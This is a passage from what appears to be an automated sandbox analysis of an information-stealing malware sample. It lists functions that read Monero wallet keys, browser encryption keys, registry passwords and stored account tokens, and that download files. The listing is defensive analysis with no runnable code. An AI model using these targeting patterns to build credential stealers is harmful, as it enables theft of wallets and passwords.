                                  • Opcode Fuzzy Hash: bcd15ad26a216a3016d0fc996bac8ebc967280c231de3d51fc5fb665d7a9dd4e
                                  • Instruction Fuzzy Hash: D1510B709701089BEB1CFF60C996AED7779EF50305F504128F80A5A192EF346B66CF62
                                  Function 002412D0 Relevance: 16.8, APIs: 11, Instructions: 310COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2170383970.0000000000231000.00000040.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                  • Associated: 00000000.00000002.2170366008.0000000000230000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.00000000002E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.00000000002ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.0000000000312000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.000000000047A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.000000000048E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.000000000061F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.00000000006F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.0000000000730000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170818052.0000000000731000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170913762.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170926050.00000000008CD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_230000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpylstrlen
                                  • String ID:
                                  • API String ID: 2001356338-0
                                  • Opcode ID: 02d05ccebfb47b877bfa795f066732bff8013bff1c2a537e9b44211daf3b1273
                                  • Instruction ID: e886aa0a5f7bd68b5a14e8c16b1929f1ef9dfcf3ab6424ef1ae9e3e907b2392f
                                  • Opcode Fuzzy Hash: 02d05ccebfb47b877bfa795f066732bff8013bff1c2a537e9b44211daf3b1273
                                  • Instruction Fuzzy Hash: 71C163B59502199BCB18EF60DC89FEE7379BB54304F0045D8E50AA7241DB70AEE5CF91
                                  Function 00244280 Relevance: 16.7, APIs: 11, Instructions: 204stringCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00248DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00248E0B
                                  • lstrcat.KERNEL32(?,00000000), ref: 002442EC
                                  • lstrcat.KERNEL32(?,0104F128), ref: 0024430B
                                  • lstrcat.KERNEL32(?,?), ref: 0024431F
                                  • lstrcat.KERNEL32(?,0104D8E0), ref: 00244333
                                    • Part of subcall function 0024A740: lstrcpy.KERNEL32(00250E17,00000000), ref: 0024A788
                                    • Part of subcall function 00248D90: GetFileAttributesA.KERNEL32(00000000,?,00231B54,?,?,0025564C,?,?,00250E1F), ref: 00248D9F
                                    • Part of subcall function 00239CE0: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00239D39
                                    • Part of subcall function 002399C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 002399EC
                                    • Part of subcall function 002399C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00239A11
                                    • Part of subcall function 002399C0: LocalAlloc.KERNEL32(00000040,?), ref: 00239A31
                                    • Part of subcall function 002399C0: ReadFile.KERNEL32(000000FF,?,00000000,0023148F,00000000), ref: 00239A5A
                                    • Part of subcall function 002399C0: LocalFree.KERNEL32(0023148F), ref: 00239A90
                                    • Part of subcall function 002399C0: CloseHandle.KERNEL32(000000FF), ref: 00239A9A
                                    • Part of subcall function 002493C0: GlobalAlloc.KERNEL32(00000000,002443DD,002443DD), ref: 002493D3
                                  • StrStrA.SHLWAPI(?,0104F038), ref: 002443F3
                                  • GlobalFree.KERNEL32(?), ref: 00244512
                                    • Part of subcall function 00239AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N#,00000000,00000000), ref: 00239AEF
                                    • Part of subcall function 00239AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00234EEE,00000000,?), ref: 00239B01
                                    • Part of subcall function 00239AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N#,00000000,00000000), ref: 00239B2A
                                    • Part of subcall function 00239AC0: LocalFree.KERNEL32(?,?,?,?,00234EEE,00000000,?), ref: 00239B3F
                                  • lstrcat.KERNEL32(?,00000000), ref: 002444A3
                                  • StrCmpCA.SHLWAPI(?,002508D1), ref: 002444C0
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 002444D2
                                  • lstrcat.KERNEL32(00000000,?), ref: 002444E5
                                  • lstrcat.KERNEL32(00000000,00250FB8), ref: 002444F4
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2170383970.0000000000231000.00000040.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                  • Associated: 00000000.00000002.2170366008.0000000000230000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.00000000002E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.00000000002ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.0000000000312000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.000000000047A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.000000000048E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.000000000061F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.00000000006F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.0000000000730000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170818052.0000000000731000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170913762.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170926050.00000000008CD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_230000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalString$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                                  • String ID:
                                  • API String ID: 3541710228-0
                                  • Opcode ID: 096d4e6f5d4799f6c09a3940d7e32604339490667cc814b298115c7ff6d4124a
                                  • Instruction ID: fe633057186dc37149fdca9c1b3437414b710456ee44e1a63a3d1aa570e3c9f7
                                  • Opcode Fuzzy Hash: 096d4e6f5d4799f6c09a3940d7e32604339490667cc814b298115c7ff6d4124a
                                  • Instruction Fuzzy Hash: 907127B6D20208A7DB14FBA0DC85FEE737DAB88300F044598F60997181DA74DB65CF96
                                  Function 00231310 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 141stringfileCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 002312A0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 002312B4
                                    • Part of subcall function 002312A0: RtlAllocateHeap.NTDLL(00000000), ref: 002312BB
                                    • Part of subcall function 002312A0: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 002312D7
                                    • Part of subcall function 002312A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 002312F5
                                    • Part of subcall function 002312A0: RegCloseKey.ADVAPI32(?), ref: 002312FF
                                  • lstrcat.KERNEL32(?,00000000), ref: 0023134F
                                  • lstrlen.KERNEL32(?), ref: 0023135C
                                  • lstrcat.KERNEL32(?,.keys), ref: 00231377
                                    • Part of subcall function 0024A740: lstrcpy.KERNEL32(00250E17,00000000), ref: 0024A788
                                    • Part of subcall function 0024A9B0: lstrlen.KERNEL32(?,01048C48,?,\Monero\wallet.keys,00250E17), ref: 0024A9C5
                                    • Part of subcall function 0024A9B0: lstrcpy.KERNEL32(00000000), ref: 0024AA04
                                    • Part of subcall function 0024A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0024AA12
                                    • Part of subcall function 0024A8A0: lstrcpy.KERNEL32(?,00250E17), ref: 0024A905
                                    • Part of subcall function 00248B60: GetSystemTime.KERNEL32(00250E1A,0104EC50,002505AE,?,?,002313F9,?,0000001A,00250E1A,00000000,?,01048C48,?,\Monero\wallet.keys,00250E17), ref: 00248B86
                                    • Part of subcall function 0024A920: lstrcpy.KERNEL32(00000000,?), ref: 0024A972
                                    • Part of subcall function 0024A920: lstrcat.KERNEL32(00000000), ref: 0024A982
                                  • CopyFileA.KERNEL32(?,00000000,00000001), ref: 00231465
                                    • Part of subcall function 0024A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0024A7E6
                                    • Part of subcall function 002399C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 002399EC
                                    • Part of subcall function 002399C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00239A11
                                    • Part of subcall function 002399C0: LocalAlloc.KERNEL32(00000040,?), ref: 00239A31
                                    • Part of subcall function 002399C0: ReadFile.KERNEL32(000000FF,?,00000000,0023148F,00000000), ref: 00239A5A
                                    • Part of subcall function 002399C0: LocalFree.KERNEL32(0023148F), ref: 00239A90
                                    • Part of subcall function 002399C0: CloseHandle.KERNEL32(000000FF), ref: 00239A9A
                                  • DeleteFileA.KERNEL32(00000000), ref: 002314EF
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2170383970.0000000000231000.00000040.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                  • Associated: 00000000.00000002.2170366008.0000000000230000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.00000000002E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.00000000002ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.0000000000312000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.000000000047A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.000000000048E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.000000000061F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.00000000006F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.0000000000730000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170818052.0000000000731000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170913762.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170926050.00000000008CD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_230000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlen$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                                  • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                                  • API String ID: 3478931302-218353709
                                  • Opcode ID: d30dec74f4060e2e97b34f0ca8ee5db99ae2b7ed965c08cf31b5f9b23eeda1be
                                  • Instruction ID: ee802a876515d27e6eaf86d1952f3d1f851cefb389a9987fd9055d9d22ececdf
                                  • Opcode Fuzzy Hash: d30dec74f4060e2e97b34f0ca8ee5db99ae2b7ed965c08cf31b5f9b23eeda1be
                                  • Instruction Fuzzy Hash: 6A5147B1D6011957DB19FB60DD92FED733CEF54304F4045A8B60A62092EE305BA9CFA6
                                  Function 002375D0 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 91stringCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 002372D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 0023733A
                                    • Part of subcall function 002372D0: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 002373B1
                                    • Part of subcall function 002372D0: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0023740D
                                    • Part of subcall function 002372D0: GetProcessHeap.KERNEL32(00000000,?), ref: 00237452
                                    • Part of subcall function 002372D0: HeapFree.KERNEL32(00000000), ref: 00237459
                                  • lstrcat.KERNEL32(00000000,002517FC), ref: 00237606
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00237648
                                  • lstrcat.KERNEL32(00000000, : ), ref: 0023765A
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 0023768F
                                  • lstrcat.KERNEL32(00000000,00251804), ref: 002376A0
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 002376D3
                                  • lstrcat.KERNEL32(00000000,00251808), ref: 002376ED
                                  • task.LIBCPMTD ref: 002376FB
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2170383970.0000000000231000.00000040.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                  • Associated: 00000000.00000002.2170366008.0000000000230000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.00000000002E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.00000000002ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.0000000000312000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.000000000047A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.000000000048E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.000000000061F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.00000000006F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.0000000000730000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170818052.0000000000731000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170913762.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170926050.00000000008CD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_230000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$Heap$EnumFreeOpenProcessValuetask
                                  • String ID: :
                                  • API String ID: 2677904052-3653984579
                                  • Opcode ID: 36f7ee937e1161c6687422c9659816ee092db5e43821eba8500203b95c5dc8a7
                                  • Instruction ID: 64b323fc35bc4a2c838111a24bca9deff242650e44fb53db25feb148c97b34dc
                                  • Opcode Fuzzy Hash: 36f7ee937e1161c6687422c9659816ee092db5e43821eba8500203b95c5dc8a7
                                  • Instruction Fuzzy Hash: 593130B1920209DFCB18EBE4DC56DFF7779BB84302F144128F116A7250DA34A9A6CF56
                                  Function 002360A0 Relevance: 13.6, APIs: 9, Instructions: 133networkfileCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 0024A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0024A7E6
                                    • Part of subcall function 002347B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00234839
                                    • Part of subcall function 002347B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00234849
                                  • InternetOpenA.WININET(00250DF7,00000001,00000000,00000000,00000000), ref: 0023610F
                                  • StrCmpCA.SHLWAPI(?,0104FCA0), ref: 00236147
                                  • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 0023618F
                                  • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 002361B3
                                  • InternetReadFile.WININET(?,?,00000400,?), ref: 002361DC
                                  • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0023620A
                                  • CloseHandle.KERNEL32(?,?,00000400), ref: 00236249
                                  • InternetCloseHandle.WININET(?), ref: 00236253
                                  • InternetCloseHandle.WININET(00000000), ref: 00236260
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2170383970.0000000000231000.00000040.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                  • Associated: 00000000.00000002.2170366008.0000000000230000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.00000000002E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.00000000002ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.0000000000312000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.000000000047A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.000000000048E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.000000000061F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.00000000006F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.0000000000730000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170818052.0000000000731000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170913762.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170926050.00000000008CD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_230000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                                  • String ID:
                                  • API String ID: 2507841554-0
                                  • Opcode ID: 8202e4164248378f819421f956f248134ea03fb7056e1d1ca30f5f04d35e8e1c
                                  • Instruction ID: 14252d0be62bc15b5fdad057b823525d7e4ec76299a5b27e2d71ec9572e12136
                                  • Opcode Fuzzy Hash: 8202e4164248378f819421f956f248134ea03fb7056e1d1ca30f5f04d35e8e1c
                                  • Instruction Fuzzy Hash: 5F5195B1960218ABDF24DF50DC49BEE77B8FB44705F1080A8F609A71C0DB74AA99CF95
                                  Function 002372D0 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 149registrymemoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 0023733A
                                  • RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 002373B1
                                  • StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0023740D
                                  • GetProcessHeap.KERNEL32(00000000,?), ref: 00237452
                                  • HeapFree.KERNEL32(00000000), ref: 00237459
                                  • task.LIBCPMTD ref: 00237555
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2170383970.0000000000231000.00000040.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                  • Associated: 00000000.00000002.2170366008.0000000000230000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.00000000002E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.00000000002ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.0000000000312000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.000000000047A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.000000000048E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.000000000061F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.00000000006F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.0000000000730000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170818052.0000000000731000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170913762.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170926050.00000000008CD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_230000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$EnumFreeOpenProcessValuetask
                                  • String ID: Password
                                  • API String ID: 775622407-3434357891
                                  • Opcode ID: 71c463ab59340d6efb1e1351ce70a172304d2eedea8bd17cd023380f8e011028
                                  • Instruction ID: 29edc09f5550abb5bd094fcd67904e47d46d85f252d8ac955e822e241caf0e8b
                                  • Opcode Fuzzy Hash: 71c463ab59340d6efb1e1351ce70a172304d2eedea8bd17cd023380f8e011028
                                  • Instruction Fuzzy Hash: AB611DF592426C9BDB24DF50CD45BDAB7B8BF44300F0081E9E689A6141DBB06BD9CF91
                                  Function 0023BA80 Relevance: 12.3, APIs: 4, Strings: 4, Instructions: 284stringCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 0024A740: lstrcpy.KERNEL32(00250E17,00000000), ref: 0024A788
                                    • Part of subcall function 0024A9B0: lstrlen.KERNEL32(?,01048C48,?,\Monero\wallet.keys,00250E17), ref: 0024A9C5
                                    • Part of subcall function 0024A9B0: lstrcpy.KERNEL32(00000000), ref: 0024AA04
                                    • Part of subcall function 0024A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0024AA12
                                    • Part of subcall function 0024A920: lstrcpy.KERNEL32(00000000,?), ref: 0024A972
                                    • Part of subcall function 0024A920: lstrcat.KERNEL32(00000000), ref: 0024A982
                                    • Part of subcall function 0024A8A0: lstrcpy.KERNEL32(?,00250E17), ref: 0024A905
                                    • Part of subcall function 0024A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0024A7E6
                                  • lstrlen.KERNEL32(00000000), ref: 0023BC9F
                                    • Part of subcall function 00248E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00248E52
                                  • StrStrA.SHLWAPI(00000000,AccountId), ref: 0023BCCD
                                  • lstrlen.KERNEL32(00000000), ref: 0023BDA5
                                  • lstrlen.KERNEL32(00000000), ref: 0023BDB9
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2170383970.0000000000231000.00000040.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                  • Associated: 00000000.00000002.2170366008.0000000000230000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.00000000002E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.00000000002ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.0000000000312000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.000000000047A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.000000000048E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.000000000061F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.00000000006F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.0000000000730000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170818052.0000000000731000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170913762.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170926050.00000000008CD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_230000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrlen$lstrcat$AllocLocal
                                  • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
                                  • API String ID: 3073930149-1079375795
                                  • Opcode ID: e2e0eedee8cdfa8e6c9f52bfae8dd5522654f7e4f365504a883942a60393bc09
                                  • Instruction ID: b6076472554323dc385532284f6112eadf9ddffc8881a398a4b24d075287d595
                                  • Opcode Fuzzy Hash: e2e0eedee8cdfa8e6c9f52bfae8dd5522654f7e4f365504a883942a60393bc09
                                  • Instruction Fuzzy Hash: 01B14271970108ABEB18FBA0DD96EEE7338EF54304F404568F507A6091EF346A69CF66
                                  Function 00246770 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 27COMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2170383970.0000000000231000.00000040.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                  • Associated: 00000000.00000002.2170366008.0000000000230000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.00000000002E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.00000000002ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.0000000000312000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.000000000047A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.000000000048E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.000000000061F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.00000000006F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.0000000000730000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170818052.0000000000731000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170913762.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170926050.00000000008CD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_230000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ExitProcess$DefaultLangUser
                                  • String ID: *
                                  • API String ID: 1494266314-163128923
                                  • Opcode ID: 5cdb2ee6aa5e6eff92b20b6faf671a37027f89a8fab78bf42b59ec367d18ddeb
                                  • Instruction ID: 0925d045a30b8219ceeb90bd586ac071d0b4c5f4552d448dc725e233ebdbb404
                                  • Opcode Fuzzy Hash: 5cdb2ee6aa5e6eff92b20b6faf671a37027f89a8fab78bf42b59ec367d18ddeb
                                  • Instruction Fuzzy Hash: BEF0FE31944219EFD748AFE0E90DB6CBB70FB45707F1401A9E60D862D0D6748BA29B9B
                                  Function 00234FB0 Relevance: 10.6, APIs: 7, Instructions: 83networkmemoryfileCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00234FCA
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00234FD1
